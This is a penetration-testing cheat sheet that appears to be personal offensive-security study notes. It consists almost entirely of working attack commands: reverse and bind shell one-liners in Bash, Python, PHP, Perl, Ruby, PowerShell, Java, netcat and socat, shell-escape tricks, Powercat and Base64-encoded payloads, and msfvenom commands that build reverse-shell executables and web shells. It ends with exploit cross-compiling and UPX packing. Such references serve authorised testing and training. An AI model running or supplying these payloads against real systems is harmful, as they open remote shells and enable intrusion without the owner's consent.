Shells, Payloads & Exploit

Shells and Payloads

# Netcat Bind Shell
nc -nlvp 4444 -e cmd.exe
nc -nv 10.11.0.22 4444
# Netcat Reverse Shell
nc -nlvp 4444
nc -nv 10.11.0.22 4444 -e /bin/bash

# Different commands used to get a reverse shell : https://www.revshells.com
Bash   : bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Python : python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP    : php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
PERL   : perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Netcat : nc -e /bin/sh 10.0.0.1 1234
Netcat : rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
Ruby   : ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Powershell : powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Java   :
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

# Different commands used to spawn an interactive shell on a Linux-based system
Python : python -c 'import pty; pty.spawn("/bin/sh")'
Sh     : /bin/sh -i
Perl   : perl -e 'exec "/bin/sh";'
Ruby   : ruby: exec "/bin/sh"
Lua    : Lua: os.execute('/bin/sh')
awk    : awk 'BEGIN {system("/bin/sh")}'
find   : find / -name nameoffile -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;
find   : find . -exec /bin/sh \; -quit
vim    : vim -c ':!/bin/sh'

# Upgrade shell TTY
python -c 'import pty; pty.spawn("/bin/bash")'
ctrl+z 
stty raw -echo;fg
<enter><enter>
reset
xterm

# Socat Reverse Shells
socat -d -d TCP4-LISTEN:443 STDOUT
socat TCP4:10.11.0.22:443 EXEC:/bin/bash

# Socat Encrypted Bind Shells
openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 362 -out bind_shell.crt
cat bind_shell.key bind_shell.crt > bind_shell.pem
sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash
socat - OPENSSL:10.11.0.4:443,verify=0

# Powercat Reverse Shells
sudo nc -lvp 443
powercat -c 10.11.0.4 -p 443 -e cmd.exe

# Powercat Bind Shells
powercat -l -p 443 -e cmd.exe
nc 10.11.0.22 443

# Powercat Stand-Alone Payloads
powercat -c 10.11.0.4 -p 443 -e cmd.exe -g > reverseshell.ps1
./reverseshell.ps1

# Creating a stand-alone encoded Base64 payload
powercat -c 10.11.0.4 -p 443 -e cmd.exe -ge > encodedreverseshell.ps1
powershell.exe -E "Base64 encoded payload"

# MSFvenom command used to generate a Linux-based reverse shell stageless payload
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > nameoffile.elf

# MSFvenom command used to generate a Windows-based reverse shell stageless payload
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > nameoffile.exe

# MSFvenom command used to generate a MacOS-based reverse shell payload
msfvenom -p osx/x86/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f macho > nameoffile.macho

# MSFvenom command used to generate an ASP web reverse shell payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.113 LPORT=443 -f asp > nameoffile.asp

# MSFvenom command used to generate a JSP web reverse shell payload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f raw > nameoffile.jsp

# MSFvenom command used to generate a WAR (Java/JSP-compatible) web reverse shell payload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f war > nameoffile.war

# Location of laudanum webshells on ParrotOS and Pwnbox
/usr/share/webshells/laudanum
# Location of Antak-Webshell on Parrot OS and Pwnbox
/usr/share/nishang/Antak-WebShell

Exploit

# Online
https://www.exploit-db.com
https://packetstorm.news
https://github.com
# Offline
Metasploit
searchsploit
/usr/share/nmap/scripts/

Cross-Compiling Exploit Code

# Compiling exploit for a Windows target
i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe -lws2_32
# Run the exploit with Wine on Linux
sudo wine syncbreeze_exploit.exe
# Packing chisel with UPX
upx --brute chisel
